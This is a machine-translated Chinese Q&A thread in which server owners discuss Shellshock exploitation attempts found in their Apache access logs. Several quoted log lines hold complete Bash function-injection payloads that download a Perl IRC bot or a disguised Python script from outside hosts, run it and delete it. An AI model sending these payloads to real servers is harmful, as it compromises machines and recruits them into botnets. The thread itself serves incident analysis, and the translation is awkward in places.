慶典彈震jurat Perl腳本

Question

我看到下面的行/var/log/apache2/access_log下：

"GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\"" 

我還沒有得到解決，以修補慶典呢。我立即關閉機器。

有沒有人在他們的日誌中看到過這個和/或檢查了在http://213.5.67.223/jurat找到的Perl腳本？這看起來相當溫和，但我想知道我應該如何擔心？

在線路338可以看到shell函數執行一個從某人拿來這是使用相同的用戶級別與apache服務器執行的IRC通道

my @resp=`$comando 2>&1 3>&1`; 

的另一端的外殼命令。我只是希望他們無法升級特權。

Answer 1

我沒有看過的細節，但它看起來並不良性的對我說：

sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds."); 

這在我看來就像某種僵屍網絡的腳本。害怕。打補丁，人。

UPDATE：分析in this blog：

如果腳本成功執行，則感染的主機將連接到腳本中的硬編碼的IRC頻道，等待命令「

那。 Baddy McBad

Answer 2

我在access_log中有過這樣的行，但有些略有不同：

""() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"" 

=>現在你可以下載它，你將獲得小人perl腳本： http://pastie.org/9604492

另一個IRC機器人的

很好的例子利用:) 希望幫助類似線程

Answer 3

見鏈接：https://superuser.com/questions/818257/is-this-an-attack-or-something-to-be-concerned-about-shellshock

這是一個腳本小子嘗試利用bash漏洞執行基於perl腳本的IRC bot。如果你有bash更新，並且另外，如果你像我一樣在chroot下運行apache，那麼你沒有什麼可擔心的。自9/27以來，至少每隔一天我都會在我的日誌中看到它的多個版本（見下文）......這只是一個噪音。

12.64.2d.static.xlhost.com - - [27/Sep/2014:12:36:34 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""   
12.64.2d.static.xlhost.com - - [29/Sep/2014:00:39:41 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""   
web21.qna.vengit.com - - [01/Oct/2014:04:52:24 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\"" 

另有各種腳本（python腳本）執行嘗試的我只注意到今天......注：google-traffic-analytics.com在python腳本下載無關W /當然谷歌。

cm232.delta210.maxonline.com.sg - - [04/Oct/2014:01:45:38 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\"" 
localhost - - [04/Oct/2014:01:45:41 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\"" 
169.118.103.218.static.netvigator.com - - [04/Oct/2014:01:45:45 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\"" 
mm-2-192-57-86.dynamic.pppoe.mgts.by - - [04/Oct/2014:01:45:52 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""